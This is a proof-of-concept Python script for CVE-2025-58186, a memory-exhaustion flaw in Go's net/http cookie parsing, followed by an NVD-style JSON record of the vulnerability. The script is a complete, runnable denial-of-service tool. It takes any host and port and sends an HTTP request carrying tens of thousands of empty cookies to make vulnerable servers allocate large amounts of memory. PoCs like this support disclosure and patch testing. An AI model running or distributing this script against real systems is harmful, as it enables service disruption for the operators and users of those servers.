CVE-2025-58186

#!/usr/bin/env python3 """ CVE-2025-58186 PoC - Go net/http Cookie Parsing Memory Exhaustion This PoC demonstrates how an attacker can cause memory exhaustion by sending HTTP requests with a large number of small cookies. """ import socket import time import sys def send_malicious_cookie_request(host, port, num_cookies): """ Send an HTTP request with many small cookies to exhaust server memory. Args: host: Target server hostname port: Target server port num_cookies: Number of small cookies to send """ # Generate many small cookies like "a=;" cookies = ";".join([f"a{i}=" for i in range(num_cookies)]) # Construct HTTP request with malicious Cookie header request = ( f"GET / HTTP/1.1\r\n" f"Host: {host}\r\n" f"Cookie: {cookies}\r\n" f"Connection: close\r\n" f"\r\n" ) try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((host, port)) sock.sendall(request.encode()) # Receive response (may be incomplete or timeout) response = b"" while True: try: chunk = sock.recv(4096) if not chunk: break response += chunk except socket.timeout: break sock.close() return True except Exception as e: print(f"Error: {e}") return False def main(): if len(sys.argv) < 3: print(f"Usage: {sys.argv[0]} <host> <port> [num_cookies]") print(f"Example: {sys.argv[0]} example.com 8080 50000") sys.exit(1) host = sys.argv[1] port = int(sys.argv[2]) num_cookies = int(sys.argv[3]) if len(sys.argv) > 3 else 50000 print(f"[*] Sending request with {num_cookies} small cookies to {host}:{port}") print(f"[*] This may cause memory exhaustion on vulnerable Go HTTP servers") send_malicious_cookie_request(host, port, num_cookies) print(f"[+] Request sent. Monitor server memory usage.") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-58186", "sourceIdentifier": "[email protected]", "published": "2025-10-29T23:16:19.547", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Despite HTTP headers having a default limit of 1MB, the number of cookies that can be parsed does not have a limit. By sending a lot of very small cookies such as \"a=;\", an attacker can make an HTTP server allocate a large amount of structs, causing large memory consumption."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "references": [{"url": "https://go.dev/cl/709855", "source": "[email protected]"}, {"url": "https://go.dev/issue/75672", "source": "[email protected]"}, {"url": "https://groups.google.com/g/golang-announce/c/4Emdl2iQ_bI", "source": "[email protected]"}, {"url": "https://pkg.go.dev/vuln/GO-2025-4012", "source": "[email protected]"}, {"url": "http://www.openwall.com/lists/oss-security/2025/10/08/1", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}